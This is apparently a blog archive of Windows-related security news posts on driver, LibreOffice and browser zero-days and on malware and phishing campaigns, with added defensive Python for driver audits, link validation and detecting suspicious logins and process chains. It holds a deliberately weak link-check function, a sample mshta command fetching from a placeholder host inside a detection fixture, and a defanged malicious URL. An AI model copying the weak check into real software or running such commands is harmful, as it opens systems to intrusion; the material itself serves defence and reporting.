Showing posts with label Windows.

Cybercriminals Target Paragon Partition Manager Vulnerability in BYOVD Attacks

 


Threat actors have reportedly been exploiting a vulnerability in the BioNTdrv.sys driver of Paragon Partition Manager in ransomware attacks, using it to elevate privileges and execute arbitrary code. The CERT Coordination Center (CERT/CC) tracks this zero-day as CVE-2025-0289, one of five security flaws in the driver that Microsoft discovered during the past year.

The identified flaws include arbitrary memory mapping, arbitrary memory write, null pointer dereference, insecure kernel resource access, and arbitrary memory move vulnerabilities. What makes them especially concerning is that BioNTdrv.sys is a Microsoft-signed driver, which allows adversaries to use it in the Bring Your Own Vulnerable Driver (BYOVD) technique.

With BYOVD, attackers can compromise systems regardless of whether Paragon Partition Manager is installed, which broadens the attack surface significantly. Because BioNTdrv.sys operates at the kernel level, exploiting these vulnerabilities lets threat actors execute commands with elevated privileges, bypass security measures and defensive software, and deploy additional malicious payloads.

Although Microsoft researchers identified all five flaws, the company has not disclosed which ransomware groups have been leveraging CVE-2025-0289; it is only known that the flaw has been weaponized in ransomware operations. A CERT/CC bulletin stated that threat actors have been exploiting this vulnerability to conduct BYOVD-based ransomware attacks.

Exploiting CVE-2025-0289 allows an attacker to escalate privileges to the SYSTEM level and execute further malicious code within a compromised environment. Because the vulnerable driver can be brought along by the attacker, the flaw enables BYOVD attacks even on systems where the affected driver is not installed, giving threat actors elevated privileges and code execution outside the reach of the security systems in place.

Among the security flaws affecting BioNTdrv.sys versions 1.3.0 and 1.5.1, CVE-2025-0285 is a flaw in version 7.9.1 that permits kernel memory to be mapped according to arbitrary user input because the input length is not properly validated. Exploiting it allows privilege escalation.

CVE-2025-0286 also exists in version 7.9.1 and results from improper validation of user-controlled input, allowing attackers to execute malicious code on the target machine. A further vulnerability in version 7.9.1, caused by insufficient validation of the MasterLrp structure in the input buffer, results in a null pointer dereference that can be reached from unprivileged code.

Successful exploitation allows arbitrary kernel-level code execution, facilitating privilege escalation and further misuse. Version 7.9.1 also contains a vulnerability in the memmove function, which fails to properly sanitize user-supplied data, allowing attackers to manipulate kernel memory and escalate privileges.

CVE-2025-0289, the insecure kernel resource access vulnerability, was found in version 17 and is caused by a failure to validate the MappedSystemVa pointer before passing it to HalReturnToFirmware. By exploiting it, attackers can compromise the system.

Paragon Software has addressed these vulnerabilities by releasing the updated driver BioNTdrv.sys version 2.0.0 across all products in its Hard Disk Manager suite, including Partition Manager versions 17.45.0 and later. The update is intended to reduce the risks associated with the previously identified security vulnerabilities.

A dedicated security patch is also available for 64-bit versions of Windows 10, Windows 11, and Windows Server 2016, 2019, 2022, and 2025, providing an additional layer of protection against future exploits. As part of its efforts to protect its ecosystem, Microsoft has updated its Vulnerable Driver Blocklist so that the vulnerable BioNTdrv.sys versions can no longer be loaded in Windows environments, preventing exploitation.

Users and enterprises are strongly encouraged to keep this protection mechanism in place. Given the ongoing threat posed by these vulnerabilities, especially in ransomware attacks, all users of Paragon Partition Manager and its associated products should update to the newest available version as soon as possible.

As a further precaution, all Windows users should make sure the Microsoft Vulnerable Driver Blocklist feature is enabled, since it is a critical defense against Bring Your Own Vulnerable Driver (BYOVD) attacks, in which outdated or insecure drivers are leveraged to escalate privileges and compromise a system.
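The two checks the article recommends, an inventory sweep for pre-2.0.0 copies of BioNTdrv.sys and a verification that the Vulnerable Driver Blocklist is switched on, can be scripted over data exported from a fleet. The following is an added example, not code from the article, Paragon or Microsoft. The driver inventory and per-host registry readings are constructed for the example; the registry key and the `VulnerableDriverBlocklistEnable` value name are the documented Microsoft settings for the blocklist, and `EXPECTED_DIR` is an assumption about where a legitimately installed driver lives.

```python
import re

# Patched BioNTdrv.sys version per the article; 1.3.0 and 1.5.1 are affected.
FIXED_VERSION = (2, 0, 0)
# Assumed normal location of an installed Windows driver; a copy anywhere
# else (e.g. a user-writable folder) is a typical BYOVD indicator.
EXPECTED_DIR = r"c:\windows\system32\drivers"

# Constructed sample: a per-host driver inventory as a fleet tool might export it.
SAMPLE_INVENTORY = [
    {"host": "ws01", "name": "BioNTdrv", "path": r"C:\Windows\System32\drivers\BioNTdrv.sys", "version": "1.3.0"},
    {"host": "ws02", "name": "BioNTdrv", "path": r"C:\Users\Public\BioNTdrv.sys", "version": "1.5.1"},
    {"host": "ws03", "name": "BioNTdrv", "path": r"C:\Windows\System32\drivers\BioNTdrv.sys", "version": "2.0.0"},
    {"host": "ws04", "name": "disk", "path": r"C:\Windows\System32\drivers\disk.sys", "version": "10.0.19041.1"},
]

# Constructed per-host readings of the documented blocklist switch under
# HKLM\SYSTEM\CurrentControlSet\Control\CI\Config (DWORD, 1 = enabled).
SAMPLE_CI_CONFIG = {
    "ws01": {"VulnerableDriverBlocklistEnable": 1},
    "ws02": {"VulnerableDriverBlocklistEnable": 0},
    "ws03": {},  # value absent: not explicitly enforced on this host
    "ws04": {"VulnerableDriverBlocklistEnable": 1},
}


def parse_version(text):
    """'1.5.1' -> (1, 5, 1); non-numeric fragments are ignored so that
    strings such as 'v2.0.0 (release)' still compare correctly."""
    return tuple(int(p) for p in re.findall(r"\d+", text))


def is_biontdrv(entry):
    basename = entry["path"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    return entry["name"].lower() == "biontdrv" or basename == "biontdrv.sys"


def audit_drivers(inventory, fixed=FIXED_VERSION):
    """Return (host, reason) findings for BioNTdrv.sys instances that are
    older than the fixed version or loaded from an unexpected location."""
    findings = []
    for e in inventory:
        if not is_biontdrv(e):
            continue
        if parse_version(e["version"]) < fixed:
            fixed_text = ".".join(map(str, fixed))
            findings.append((e["host"], f"BioNTdrv.sys {e['version']} is older than {fixed_text}"))
        if not e["path"].lower().startswith(EXPECTED_DIR):
            findings.append((e["host"], f"BioNTdrv.sys loaded from unexpected path {e['path']}"))
    return findings


def blocklist_disabled_hosts(ci_config):
    """Hosts where VulnerableDriverBlocklistEnable is not explicitly set to 1."""
    return sorted(h for h, vals in ci_config.items()
                  if vals.get("VulnerableDriverBlocklistEnable") != 1)


if __name__ == "__main__":
    for host, reason in audit_drivers(SAMPLE_INVENTORY):
        print(f"{host}: {reason}")
    print("blocklist not enforced on:", blocklist_disabled_hosts(SAMPLE_CI_CONFIG))
```

Note that the location check is deliberately separate from the version check: a fully patched driver sitting in a user-writable directory still deserves a look, and a host with the blocklist value absent should be confirmed rather than assumed safe, because the default depends on the Windows build.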

LibreOffice Fixes Security Flaw That Allowed Malicious File Execution

 



LibreOffice, a popular free office suite, recently fixed a major security flaw that could have let hackers run harmful files on Windows computers. The issue, identified as CVE-2025-0514, was related to how the software handled links inside documents. If exploited, it could allow attackers to trick users into opening dangerous files.  


How the flaw worked  

LibreOffice allows users to click on hyperlinks in documents to open websites or files. Normally, it blocks links that try to open unsafe files, but older versions (before 24.8.5) failed to properly check certain types of links.  

Hackers found a way to trick the software by using specially designed web addresses. When a user clicked one of these deceptive links, LibreOffice could mistakenly treat it as a local file path and execute harmful programs. Unlike other document-based attacks that require macros, this method only needed the user to click a link, making it especially dangerous.  


LibreOffice fixes the issue  

To prevent such attacks, LibreOffice released version 24.8.5 on February 25, 2025. The update improves how the software checks links, ensuring that unsafe web addresses cannot be mistaken for local files.  
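The flaw described above comes down to a link check that only rejects targets literally marked as files, while the operating system may still treat other strings as paths. The following is an added example, not LibreOffice's code or its actual fix: a deliberately weak `naive_is_safe_link` beside an allow-list `hardened_is_safe_link` that parses the target, requires a permitted scheme and host, and refuses anything that also reads as a Windows path. The sample link targets are constructed and the allowed scheme set is an assumption.

```python
from urllib.parse import urlsplit

# Schemes a document viewer can reasonably hand to the browser or mail client
# (assumed allow-list for this example).
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def naive_is_safe_link(target):
    """Weak check: rejects only links that literally announce a local file.
    Anything else is waved through as if it were a web address, even when
    the operating system would interpret the string as a file path."""
    return not target.strip().lower().startswith("file:")


def looks_like_local_path(target):
    """Heuristics for strings a Windows shell treats as a path rather than
    a URL: UNC shares, drive letters, and any backslash at all."""
    t = target.strip()
    return (
        t.startswith(("\\\\", "//"))                          # \\host\share or //host/share
        or (len(t) >= 2 and t[0].isalpha() and t[1] == ":")  # C:\... drive letter
        or "\\" in t
    )


def hardened_is_safe_link(target):
    """Allow-list check: parse the link, require a permitted scheme and
    (for web links) a host, and refuse anything that also reads as a path."""
    t = target.strip()
    if looks_like_local_path(t):
        return False
    parts = urlsplit(t)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False
    if scheme in ("http", "https") and not parts.netloc:
        return False
    return True


# Constructed link targets (not taken from the advisory): the first two are
# ordinary hyperlinks; the rest are shapes a viewer must never pass to the shell.
SAMPLE_LINKS = [
    "https://example.com/report",
    "mailto:helpdesk@example.com",
    "file:///C:/Users/Public/tool.exe",
    r"\\fileserver\share\tool.exe",
    r"C:\Users\Public\tool.exe",
    "ftp://example.com/tool.exe",
]


def compare(links=SAMPLE_LINKS):
    """Map each link to (naive verdict, hardened verdict) so the gap between
    the two checks is visible."""
    return {link: (naive_is_safe_link(link), hardened_is_safe_link(link)) for link in links}


if __name__ == "__main__":
    for link, (naive, hard) in compare().items():
        print(f"{link!r:40} naive={naive!s:5} hardened={hard}")
```

The design point is that the hardened check never asks "is this dangerous?"; it asks "is this one of the few shapes I explicitly support?", so an unfamiliar scheme or a path-like string fails closed instead of falling through to the shell.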

Developers Caolán McNamara from Collabora Productivity and Stephan Bergmann from allotropia worked on fixing the issue after it was reported by security researcher Amel Bouziane-Leblond. The flaw highlighted how small errors in how software reads links can create serious security risks.  


What users should do  

This vulnerability could be used in phishing scams where hackers send fake documents to trick people into clicking malicious links. To stay safe, users should update their LibreOffice software immediately.  

Here are some steps to stay protected:  

1. Install the latest LibreOffice update (24.8.5 or later) to fix the issue  

2. Be cautious with documents from unknown sources, especially if they contain links  

3. Avoid clicking hyperlinks in documents unless you trust the sender  

4. Businesses should ensure all their computers are updated to reduce security risks  


The importance of updates 

While this flaw mainly affected Windows users, it highlights the need for strong security measures in office software. Cybercriminals constantly find new ways to exploit common tools, making software updates and user awareness essential.  

So far, there are no known real-world attacks using this vulnerability, but security experts consider it critical. Users can download the latest LibreOffice version from the official website or update it through Linux package managers.

LightSpy Malware Attacks Users, Launches Over 100 Commands to Steal Data


Cybersecurity researchers at Hunt.io have found an updated version of the LightSpy implant, a modular surveillance framework for data collection and exfiltration. Initially known for targeting mobile devices, it has since been found to attack macOS, Windows, Linux, and routers. 

LightSpy has been used in targeted attacks, relying on watering hole techniques and exploit-based delivery together with infrastructure that quickly evades detection. It was first reported in 2020, targeting users in Hong Kong.

History of LightSpy

LightSpy has historically been known for targeting messaging apps such as WeChat, Telegram, QQ, Line, and WhatsApp across different operating systems. According to a ThreatFabric report, the framework can extract payment data from WeChat, remove contacts, wipe messaging history, and much more.

The data collected includes WiFi network details, iCloud Keychain contents, screenshots, location, browser history, photos, call history, and SMS messages.

Regarding the server analysis, Hunt.io's researchers said the servers "share similarities with prior malicious infrastructure but introduce notable differences in the command list."

Further: "As previously observed, the cmd_list endpoint is at /ujmfanncy76211/front_api. Another endpoint, command_list, also exists but requires authentication, preventing direct analysis."

LightSpy Capabilities

In 2024, ThreatFabric reported an updated version of the malware with a destructive capability to stop a compromised device from booting, along with an increase in the number of supported plugins from 12 to 28.

Earlier research has disclosed potential overlaps between an Android malware called "DragonEgg" and LightSpy, showing the threat's cross-platform nature.

Hunt.io's recent analysis of the command-and-control (C2) infrastructure linked to the spyware found support for more than 100 commands spanning iOS, macOS, Linux, routers, and Windows.

Expert insights

Commenting on the overall impact of the malware, Hunt.io experts state that “LightSpy's infrastructure reveals previously unreported components and administrative functionality.” However, they remain unsure whether this represents new developments or earlier versions that were not publicly reported. Hunt.io concludes that “Command set modifications and Windows-targeted plugins suggest that operators continue to refine their data collection and surveillance approach across multiple platforms.”

To stay safe, experts suggest that users:

Limit app permissions to avoid unwanted access to important data. “On Android, use Privacy Dashboard to review and revoke permissions; on iOS, enable App Privacy Reports to monitor background data access.”

Turn on advanced device security features that make devices harder to exploit. iOS users can enable Lockdown Mode, and Android users can turn on Enhanced Google Play Protect and use its protection features to identify and block suspicious activity. 

BlackLock Ransomware: The Fastest-Growing Cyber Threat and How to Stay Safe

 



Ransomware remains a major problem for businesses, and a new cybercriminal group is expanding at an alarming rate. Security researchers at ReliaQuest have identified BlackLock as the fastest-growing ransomware operation today, with its activity increasing by 1,425% since late 2024. Although it is currently the seventh most active ransomware group, experts predict it could become the biggest threat in 2025.  

Despite law enforcement cracking down on major ransomware gangs like LockBit in 2024, the number of cyberattacks continues to grow. A report from January 31 suggested ransomware incidents had risen by 15% compared to the previous year. However, a February 20 study by Symantec showed a slower increase of just 3%. No matter the rate, the takeaway is the same: ransomware remains a serious risk.  


How BlackLock Ransomware Operates  

BlackLock ransomware is designed to infect Windows, Linux, and VMware ESXi systems, making it a versatile and dangerous threat. Cybercriminals behind this operation have developed unique methods to pressure victims into paying ransom quickly.  


1. Blocking access to stolen data  

  • Ransomware groups often leak stolen information on dark web sites to force victims to pay.  
  • BlackLock makes it harder for victims and cybersecurity teams to access leaked data by blocking repeated download attempts.  
  • If someone tries to retrieve files too often, they either receive no response or only see empty files with contact details instead of real data.  
  • This tactic prevents companies from fully understanding what was stolen, increasing the likelihood of paying the ransom.  


2. Recruiting criminals to assist with attacks  

  • BlackLock actively hires "traffers," cybercriminals who help spread ransomware by tricking people into downloading malware.  
  • These traffers guide victims toward fake websites or malicious links that install ransomware.  
  • The group openly recruits low-level hackers on underground forums, while more skilled cybercriminals are privately contacted for higher-level roles.  


Steps to Protect Your Systems  

Security experts recommend taking immediate action to strengthen defenses, especially for companies using VMware ESXi servers. Here are some key steps:  

1. Turn off unnecessary services  

  • Disable unused features like vMotion and SNMP to reduce possible entry points for attackers.  

2. Strengthen security restrictions  

  •  Configure VMware ESXi hosts to only allow management through vCenter, making it harder for hackers to exploit weaknesses.  

3. Limit network access  

  •  Use firewalls and strict access controls to prevent unauthorized users from reaching sensitive systems.  

Additional recommendations include:  

1. Activating multi-factor authentication (MFA) to prevent unauthorized logins.  

2. Disabling Remote Desktop Protocol (RDP) on systems that do not need remote access.  

The rapid rise of BlackLock ransomware shows that cybercriminals are constantly developing new strategies to pressure victims and avoid detection. Organizations must take proactive steps to secure their networks and stay informed about emerging threats. Implementing strong security controls today can prevent costly cyberattacks in the future.

Hackers Steal Login Details via Fake Microsoft ADFS login pages

Microsoft ADFS login pages

A help desk-themed phishing campaign targeted companies' Microsoft Active Directory Federation Services (ADFS) with fake login pages and stole credentials while bypassing multi-factor authentication (MFA) protections.

The campaign hit healthcare, government, and education organizations, targeting around 150 victims, according to Abnormal Security. The attacks aim to gain access to corporate mail accounts, either to send emails to more victims inside a company or to launch financially motivated campaigns such as business email compromise (BEC), where money is sent directly to the attackers' accounts. 

Fake Microsoft ADFS login pages 

ADFS is a Microsoft authentication mechanism that lets users log in once and access multiple applications and services, sparing them from entering credentials repeatedly. 

ADFS is generally used by large businesses, as it offers single sign-on (SSO) for internal and cloud-based apps. 

The threat actors send emails to victims spoofing their company's IT team, asking them to sign in to update their security configurations or accept the latest policies. 

How victims are trapped

When victims click the embedded button, they are taken to a phishing site that looks identical to their company's genuine ADFS sign-in page. The fake page then asks the victim to enter their username, password, and MFA code, or tricks them into approving a push notification.

What do the experts say

The security report by Abnormal suggests, "The phishing templates also include forms designed to capture the specific second factor required to authenticate the targets account, based on the organization's configured MFA settings.” Additionally, "Abnormal observed templates targeting multiple commonly used MFA mechanisms, including Microsoft Authenticator, Duo Security, and SMS verification."

After the victim has supplied all the information, they are redirected to the real sign-in page to avoid suspicion and make the process look authentic. 

The threat actors then immediately use the stolen information to sign in to the victim's account, steal sensitive data, create new email filter rules, and attempt lateral phishing. 

According to Abnormal, the threat actors used Private Internet Access VPN to hide their location and obtain an IP address closer to the organization.  
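The post-compromise behaviour described above (a sign-in from an address the user has never used, followed shortly by a new mailbox rule) is a pattern that can be detected from sign-in and mailbox audit logs. The following is an added example, not code from Abnormal Security: it correlates the two event types per user within a time window. The events and baseline address sets are constructed for the example; `New-InboxRule` is the operation name the Exchange audit log records when a mailbox rule is created, and the 60-minute window is an assumed tuning value.

```python
from datetime import datetime, timedelta

# Constructed audit records (not from Abnormal Security's report): sign-ins and
# mailbox changes for two users. Addresses are documentation ranges.
SAMPLE_EVENTS = [
    {"time": "2025-02-03T08:02:00", "user": "alice", "op": "SignIn", "ip": "203.0.113.10"},
    {"time": "2025-02-03T08:40:00", "user": "alice", "op": "SignIn", "ip": "198.51.100.77"},
    {"time": "2025-02-03T08:46:00", "user": "alice", "op": "New-InboxRule", "ip": "198.51.100.77",
     "detail": "MoveToFolder=RSS Subscriptions; MarkAsRead=True"},
    {"time": "2025-02-03T09:10:00", "user": "bob", "op": "SignIn", "ip": "203.0.113.22"},
    {"time": "2025-02-03T12:00:00", "user": "bob", "op": "New-InboxRule", "ip": "203.0.113.22",
     "detail": "MoveToFolder=Projects"},
]

# Addresses each user has signed in from before (constructed baseline; a real
# deployment would derive it from, for example, the previous 30 days of logs).
BASELINE_IPS = {"alice": {"203.0.113.10"}, "bob": {"203.0.113.22"}}
WINDOW = timedelta(minutes=60)  # assumed tuning value


def detect_rule_after_new_ip(events, baseline, window=WINDOW):
    """Alert when a user creates an inbox rule within `window` of signing in
    from an address not in their baseline. Events are processed in time
    order; only the most recent unseen-address sign-in per user is kept."""
    alerts = []
    last_new_ip_login = {}  # user -> (time, ip)
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        user = ev["user"]
        if ev["op"] == "SignIn":
            if ev["ip"] not in baseline.get(user, set()):
                last_new_ip_login[user] = (t, ev["ip"])
        elif ev["op"] == "New-InboxRule" and user in last_new_ip_login:
            t0, ip = last_new_ip_login[user]
            if t - t0 <= window:
                alerts.append({
                    "user": user,
                    "ip": ip,
                    "minutes_after_login": int((t - t0).total_seconds() // 60),
                    "rule": ev.get("detail", ""),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_rule_after_new_ip(SAMPLE_EVENTS, BASELINE_IPS):
        print(alert)
```

Bob's rule creation is not flagged because it comes from a known address; Alice's is, because the address was never seen before and the rule follows six minutes later. Rules that move mail to rarely viewed folders or mark it as read are exactly what an attacker creates to hide their replies, so the rule text is carried into the alert for the analyst.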

Hackers Disguise as IT Employees: FBI Warns to Disable Local Admin Accounts


Hackers use various ways to steal data, and one recent trend, according to the FBI, is that they have started gaining employment at companies. The agency has issued public service announcement I-012325-PSA, warning organizations in the U.S. to disable local admin accounts; businesses should pay attention to it.

North Korean Hackers Disguising as IT Workers

The FBI has warned the public, the private sector, and the world about the “victimization of US-based businesses”, as cyberattacks involving remote IT workers from North Korea are on the rise. It has observed North Korean IT workers gaining unauthorized access to systems to steal confidential data and launch other cybercrime operations. 

In an FBI announcement reported by Forbes, it was disclosed that “victims have seen proprietary data and code held to ransom,” and “the copying of corporate code repositories to attacker user profiles and personal cloud accounts.” Additionally,  the attackers have also “attempted harvesting of company credentials and session cookies for further compromise opportunities.” 

Understanding the “Principle of Least Privilege”

Law enforcement and intelligence agencies like the FBI and NSA (National Security Agency) have advised the principle of least privilege,  to “only allow designated administrator accounts to be used for administrative purposes.” The aim is to limit the administrative rights available to Mac and Windows users to ensure security. 

The principle of least privilege gives admin account access to only selected people, and nobody else. The method ensures company employees only have access to particular resources needed to get the job done, not admin rights. For instance, the user account completes day-to-day needs, whereas for something critical, like software installation, the systems will ask for admin credentials. 

Wikipedia offers a good example of this technique: a user account created for making backups does not need to install software and has only the rights needed to run backups and related applications. 

Mitigating Threats: Advice from FBI and Security Experts

The FBI suggests that businesses disable local administrator accounts, restrict privileges for installing remote desktop apps, and keep an eye out for unusual network traffic. It reminds organizations that “North Korean IT workers often have multiple logins into one account in a short period of time,” coming from various IP addresses linked to different countries. 
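The sign-in pattern the FBI describes, one account used from several addresses in different countries within a short period, can be turned into a straightforward detection over sign-in logs. The following is an added example, not code from the FBI or NSA: it groups sign-ins per account and slides a time window looking for a burst that spans multiple countries and addresses. The sign-in records are constructed, the country column stands in for a GeoIP lookup the real pipeline would perform, and the one-hour window and thresholds are assumed tuning values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in records: (timestamp, account, source IP, country).
# Addresses are documentation ranges and the accounts are made up.
SAMPLE_LOGINS = [
    ("2025-01-20T09:00:00", "dev-contractor-1", "203.0.113.5", "US"),
    ("2025-01-20T09:12:00", "dev-contractor-1", "198.51.100.9", "DE"),
    ("2025-01-20T09:30:00", "dev-contractor-1", "192.0.2.44", "CN"),
    ("2025-01-20T10:05:00", "dev-contractor-1", "203.0.113.5", "US"),
    ("2025-01-20T09:05:00", "alice", "203.0.113.20", "US"),
    ("2025-01-20T17:40:00", "alice", "203.0.113.20", "US"),
]


def find_multi_country_bursts(logins, window=timedelta(hours=1), min_countries=2, min_ips=2):
    """For each account, slide a time window over its sign-ins and report the
    first window containing sign-ins from at least `min_countries` countries
    and `min_ips` distinct addresses. Thresholds are assumed tuning values."""
    by_user = defaultdict(list)
    for ts, user, ip, country in logins:
        by_user[user].append((datetime.fromisoformat(ts), ip, country))

    hits = {}
    for user, rows in by_user.items():
        rows.sort()  # chronological order per account
        for i, (t_start, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - t_start <= window]
            ips = {r[1] for r in in_window}
            countries = {r[2] for r in in_window}
            if len(countries) >= min_countries and len(ips) >= min_ips:
                hits[user] = {
                    "start": t_start.isoformat(),
                    "end": in_window[-1][0].isoformat(),
                    "ips": sorted(ips),
                    "countries": sorted(countries),
                }
                break  # one finding per account is enough to raise a case
    return hits


if __name__ == "__main__":
    for user, info in find_multi_country_bursts(SAMPLE_LOGINS).items():
        print(user, info)
```

In the sample, the contractor account is reported for the 09:00 to 09:30 window (three addresses, three countries); the later 10:05 sign-in falls outside the hour and is not needed to trigger. Legitimate travellers and corporate VPN egress points will produce some hits, so in practice the country set should exclude known VPN exit countries before alerting.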

The agency has also advised HR departments, development teams, and hiring managers to focus “on changes in address or payment platforms during the onboarding process.”

New Malware Campaign Attacks Manufacturing Industry


Lumma Stealer and Amadey Bot Resurface

In a recent multi-stage cyberattack, Cyble Research and Intelligence (CRIL) found an attack campaign hitting the manufacturing industry. The campaign relies on process injection techniques aimed at delivering malicious payloads such as Amadey Bot and Lumma Stealer.

Using a chain of evasive actions, the threat actor (TA) exploits diverse Windows tools and processes to escape standard security checks, which leads to persistent system control and potential data theft. 

About the campaign

CRIL found an advanced multi-stage attack campaign that starts with a spear-phishing email. The email contains a link to an LNK file disguised as a PDF. When the fake PDF is opened, it launches a series of commands. The LNK file is hosted on a WebDAV server, making it harder for security software to trace.

“For instance, one of the malicious links observed in the campaign was hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop. The attack’s effectiveness stems from its ability to exploit the name of a legitimate cloud-based document management system (LogicalDOC), commonly used in manufacturing and engineering industries, to convince targets into opening the file,” reports the Cyber Express.

How the campaign works

Once the LNK file is executed, it launches ssh.exe, a legitimate system utility that can bypass security software's detection. Through ssh.exe, a PowerShell command is triggered, which fetches an additional payload from a remote server using mshta.exe. This process is designed to evade detection by using Google's Accelerated Mobile Pages (AMP) framework combined with a shortened URL. 

The fetched payload is a script containing additional obfuscated commands that eventually deliver the final malicious payload to the victim's system. 
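The execution chain described above (ssh.exe spawning PowerShell, which spawns mshta.exe) is unusual enough in a manufacturing environment that the parent-child sequence itself is a good detection, independent of the URL or payload. The following is an added example, not Cyble's code or its published Sigma rules: it reconstructs each process's ancestry from process-creation events and flags any process whose lineage ends with that sequence. The events are constructed in the shape of Sysmon Event ID 1 data, with placeholder command lines.

```python
# Constructed process-creation events (pid, parent pid, image path, command
# line). The malicious lineage follows the article; the benign one below it
# is an administrator who opens PowerShell and then runs ssh by hand.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "cmd": "ssh.exe <args>"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -NoProfile -Command <redacted>"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://example.invalid/page"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "cmd": "ssh.exe admin@host"},
]

# Parent-to-child sequence the article describes.
SUSPICIOUS_CHAIN = ("ssh.exe", "powershell.exe", "mshta.exe")


def basename(path):
    """Case-insensitive file name of a Windows image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def lineage(by_pid, pid):
    """Image basenames from the oldest known ancestor down to `pid`.
    The visited set guards against pid reuse producing a cycle."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(names))


def detect_chain(events, pattern=SUSPICIOUS_CHAIN):
    """Return every process whose ancestry ends with `pattern`, i.e. the
    pattern's last image is the process itself and each earlier image is
    the direct parent of the next."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        chain = lineage(by_pid, e["pid"])
        if tuple(chain[-len(pattern):]) == pattern:
            hits.append({"pid": e["pid"], "lineage": " -> ".join(chain), "cmd": e["cmd"]})
    return hits


if __name__ == "__main__":
    for hit in detect_chain(SAMPLE_EVENTS):
        print(hit)
```

Requiring the three images as direct parent-child steps, rather than merely all present somewhere in the tree, is what keeps the administrator's PowerShell-then-ssh session out of the results. The same function can be reused with other patterns (for example, an Office application spawning a script host) by passing a different tuple.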

The Cyble blog says, “The final payload, which involves the deployment of both Lumma stealer and Amadey bot, highlights the TA’s intent to steal sensitive information and maintain persistent control over compromised systems. Yara and Sigma rules to detect this campaign, are available for download from the linked GitHub repository.”    

Russian Hackers Use Firefox and Windows Vulnerabilities in Global Cyberattack

 



A sophisticated cyberattack carried out by the Russian cyber threat group RomCom APT has raised alarms within the global cybersecurity community. Exploiting two previously unknown zero-day vulnerabilities in Firefox and Windows, the attack, which took place in October, was able to infiltrate systems without any user interaction. This tactic marks a concerning escalation in cyberattack methods, highlighting the ever-growing sophistication of threat actors. 
 

How the Attack Unfolded 

 
RomCom APT used two critical vulnerabilities to carry out its campaign: 
 
1. Firefox Animation Timeline Vulnerability (CVE-2024-9680) 
 
A severe flaw in Firefox's animation timelines allowed the attackers to remotely execute malicious code. Rated 9.8 out of 10 on the Common Vulnerability Scoring System (CVSS), the vulnerability was exploited through fake websites. Victims who visited these websites unknowingly downloaded malware known as the RomCom backdoor. Once installed, the malware silently redirected users to the legitimate websites they intended to visit, leaving them unaware of the compromise. This vulnerability also affected the Tor Browser, which shares a code base with Firefox, broadening its potential impact. 

2. Windows Task Scheduler Vulnerability (CVE-2024-49039) 
 
The second vulnerability resided in the Windows Task Scheduler, with a CVSS score of 8.8. This flaw allowed the attackers to bypass the security sandbox of the browser, escalating privileges and providing them with full access to the victim's system. With this level of control, RomCom hackers were able to execute further malicious activities undetected. 

 
Targets and Techniques 

 
RomCom APT deployed fake websites posing as well-known platforms, including ConnectWise, Devolutions, and Correctiv, to lure victims. The group targeted high-value sectors such as insurance, pharmaceuticals, defense, energy, and government institutions, with the majority of victims located in North America and Europe, particularly in Germany, France, and the United States. 
 
RomCom is notorious for combining cybercrime with politically motivated espionage. This attack is part of a broader pattern targeting politically and economically sensitive sectors. Prompt responses from cybersecurity teams, including collaboration with security experts, helped prevent the attack from spreading widely, limiting its impact. 
 

Swift Vulnerability Patching 
 

Fortunately, both vulnerabilities were addressed promptly. Mozilla released a patch for the Firefox flaw on October 9, just 25 hours after it was notified. Similarly, Microsoft issued a patch for the Windows vulnerability on November 12. These swift responses underscore the importance of keeping systems updated, as timely patches are often the first line of defense against zero-day vulnerabilities. 

 
Cybersecurity Takeaways 

 
This attack serves as a stark reminder of the necessity for robust software maintenance and a proactive patch management strategy. Zero-day vulnerabilities are often exploited rapidly, making regular updates crucial for minimizing the risk of exploitation. While the RomCom attack was relatively short-lived, it underscores the evolving nature of cyber threats. Organizations and individuals alike must stay vigilant, prioritize timely software updates, and adopt comprehensive cybersecurity measures to protect against increasingly sophisticated attacks.   
 

Key Points for Cybersecurity Practitioners: 

  • Maintain Updated Software: Regular updates and patches are essential to protecting against zero-day vulnerabilities. 
  • Awareness of Emerging Threats: Understand and mitigate the risks associated with zero-click attacks and other advanced persistent threats. 
  • Strengthen Incident Response: Timely detection and rapid response are critical to minimizing the impact of cyberattacks.

Godot Game Engine Targeted in Widespread Malware Attack

 


A newly identified malware threat, GodLoader, is targeting gamers globally by exploiting the Godot game development engine, according to a report from Check Point Research. This sophisticated attack has already impacted more than 1.2 million users across various platforms. 

How GodLoader Works 

 
GodLoader infiltrates devices by leveraging Godot’s .pck files, which package game assets. These files can embed harmful scripts that execute malicious code upon launching a game, effectively bypassing traditional antivirus detection. The malware primarily targets: 

- Windows 
- macOS 
- Linux 
- Android 
- iOS 

Check Point Research reported that hackers have infected over 17,000 systems in just the past three months. By utilizing Godot’s GDScript (a Python-like scripting language), attackers distribute malware via more than 200 GitHub repositories, often masked as legitimate game assets. 

Exploitation of Open-Source Trust 


Eli Smadja, Security Research Group Manager at Check Point Software Technologies, highlighted the exploitation of open-source platforms:  

"Cybercriminals have turned the flexibility of the Godot Engine into a vulnerability, spreading cross-platform malware like GodLoader by capitalizing on the trust users place in open-source software." 

